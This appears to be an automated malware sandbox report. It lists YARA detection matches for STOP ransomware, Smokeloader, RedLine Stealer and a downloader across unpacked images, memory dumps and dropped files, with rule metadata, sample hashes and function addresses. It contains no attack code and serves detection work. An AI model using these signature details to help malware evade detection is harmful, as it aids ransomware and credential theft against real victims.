Source: 42.2.3046.exe.23315a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 42.2.3046.exe.23315a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 13.2.3046.exe.23515a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 13.2.3046.exe.23515a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 15.2.3046.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 15.2.3046.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 42.2.3046.exe.23315a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 42.2.3046.exe.23315a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 33.2.3046.exe.23515a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 33.2.3046.exe.23515a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 13.2.3046.exe.23515a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 13.2.3046.exe.23515a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 39.2.3046.exe.23815a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 39.2.3046.exe.23815a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 39.2.3046.exe.23815a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 39.2.3046.exe.23815a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 14.0.A33B.exe.7b0000.0.unpack, type: UNPACKEDPE Matched rule: Detects downloader / injector Author: ditekSHen
Source: 00000011.00000002.443553763.0000000000640000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000011.00000002.444263115.0000000000816000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.313442333.0000000000926000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000D.00000002.396738460.000000000222E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000021.00000002.516055302.00000000022BA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000002A.00000002.518333813.0000000002290000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000012.00000002.483535048.0000000000726000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.313241208.0000000000680000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000D.00000002.396916881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000000.00000002.313394418.0000000000851000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.313299344.0000000000720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000F.00000002.467843881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000F.00000002.467843881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000011.00000002.443874552.00000000007E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000B.00000002.604551133.0000000000550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000012.00000002.483475283.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000B.00000002.605642320.00000000007C6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000011.00000002.444700260.00000000021E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000027.00000002.517661661.00000000022E4000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000002A.00000002.518796436.0000000002330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000021.00000002.516427401.0000000002350000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000027.00000002.518320509.0000000002380000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 3046.exe PID: 3680, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 3046.exe PID: 5672, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 3046.exe PID: 3112, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: C:\Users\user\AppData\Local\Temp\A33B.exe, type: DROPPED Matched rule: Detects downloader / injector Author: ditekSHen
Source: llpb1133.exe.14.dr Static PE information: .vmp0 and .vmp1 section names
Source: C:\Users\user\AppData\Local\Temp\ECFB.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 996 -s 520
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00415458 0_2_00415458
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041545C 0_2_0041545C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040B403 0_2_0040B403
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00411D50 0_2_00411D50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00413E21 0_2_00413E21
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00412294 0_2_00412294
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004127D8 0_2_004127D8
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_004010E0 11_2_004010E0
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_00406150 11_2_00406150
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_004041D0 11_2_004041D0
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_004021D0 11_2_004021D0
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_0042429D 11_2_0042429D
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_00411470 11_2_00411470
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_0042C5FE 11_2_0042C5FE
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_004266B9 11_2_004266B9
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_00402830 11_2_00402830
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_0040C9A0 11_2_0040C9A0
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_00419A6E 11_2_00419A6E
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_0041CAF0 11_2_0041CAF0
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_00409B10 11_2_00409B10
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_0042AB9A 11_2_0042AB9A
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_0040CC40 11_2_0040CC40
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_00401D90 11_2_00401D90
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_0040CE90 11_2_0040CE90
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_00421F48 11_2_00421F48
Source: sqlite3.dll.19.dr Static PE information: Number of sections : 18 > 10
Source: XandETC.exe.14.dr Static PE information: Number of sections : 11 > 10
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 15.2.3046.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 15.2.3046.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 15.2.3046.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 33.2.3046.exe.23515a0.1.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 33.2.3046.exe.23515a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 33.2.3046.exe.23515a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 42.2.3046.exe.23315a0.1.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 42.2.3046.exe.23315a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 42.2.3046.exe.23315a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 13.2.3046.exe.23515a0.1.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 13.2.3046.exe.23515a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 13.2.3046.exe.23515a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 15.2.3046.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 15.2.3046.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 15.2.3046.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 42.2.3046.exe.23315a0.1.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 42.2.3046.exe.23315a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 42.2.3046.exe.23315a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 33.2.3046.exe.23515a0.1.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 33.2.3046.exe.23515a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 33.2.3046.exe.23515a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 13.2.3046.exe.23515a0.1.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 13.2.3046.exe.23515a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 13.2.3046.exe.23515a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 39.2.3046.exe.23815a0.1.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 39.2.3046.exe.23815a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 39.2.3046.exe.23815a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 39.2.3046.exe.23815a0.1.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 39.2.3046.exe.23815a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 39.2.3046.exe.23815a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 14.0.A33B.exe.7b0000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
Source: 00000011.00000002.443553763.0000000000640000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000011.00000002.444263115.0000000000816000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.313442333.0000000000926000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000D.00000002.396738460.000000000222E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000021.00000002.516055302.00000000022BA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000002A.00000002.518333813.0000000002290000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000012.00000002.483535048.0000000000726000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.313241208.0000000000680000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000D.00000002.396916881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000000.00000002.313394418.0000000000851000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.313299344.0000000000720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000F.00000002.467843881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 0000000F.00000002.467843881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000000F.00000002.467843881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000011.00000002.443874552.00000000007E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000B.00000002.604551133.0000000000550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000012.00000002.483475283.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000B.00000002.605642320.00000000007C6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
